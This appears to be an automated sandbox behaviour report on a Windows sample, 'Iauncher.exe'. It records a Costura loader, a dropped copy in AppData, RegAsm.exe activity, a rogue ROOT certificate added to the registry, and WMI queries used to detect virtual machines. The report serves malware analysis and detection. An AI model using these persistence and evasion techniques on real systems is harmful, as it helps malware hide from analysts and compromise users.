Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.
Source: C:\Users\user\Desktop\Iauncher.exe	Automated click: I agree to the License terms and conditions.

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Iauncher.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Iauncher.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Iauncher.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
Source:	Binary string: costura.costura.pdb.compressedlB^q source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: Iauncher.exe
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: Iauncher.exe
Source:	Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Iauncher.exe, AssemblyLoader.cs

.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: Iauncher.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Iauncher.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1618643197.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Iauncher.exe PID: 2448, type: MEMORYSTR

Source: Iauncher.exe

Static PE information: 0xACDA9736 [Wed Nov 23 21:25:10 2061 UTC]

Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_04E000C4 push eax; iretd	0_2_04E000CD
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_05CB8940 push esp; ret	0_2_05CB8941
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_07924D0F push esp; retf	0_2_07924D29
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_07924439 push es; ret	0_2_07924430
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_079243B8 push es; ret	0_2_07924430
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F1E350 push E80E755Eh; ret	0_2_09F1E369
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 0_2_09F1272A push eax; ret	0_2_09F12731
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F3E081 pushad ; ret	2_2_00F3E082
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F162BA push ecx; ret	2_2_00F162CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06020F04 push ebp; retf	4_2_06020F05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06020DF1 push esi; retf	4_2_06020DF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0602118F push edx; retf	4_2_06021191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0604DFD1 push es; ret	4_2_0604DFE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0604ECF2 push eax; ret	4_2_0604ED01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06043B4F push dword ptr [esp+ecx*2-75h]; ret	4_2_06043B53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_060449AB push FFFFFF8Bh; retf	4_2_060449AD

Source: Iauncher.exe

Static PE information: section name: .text entropy: 7.90237020530487

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe

File created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Iauncher.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\Iauncher.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Memory allocated: 4830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 26F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: BE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe TID: 7288	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe TID: 7288	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Code function: 2_2_00F2960E FindFirstFileExW,

2_2_00F2960E

Source: C:\Users\user\Desktop\Iauncher.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
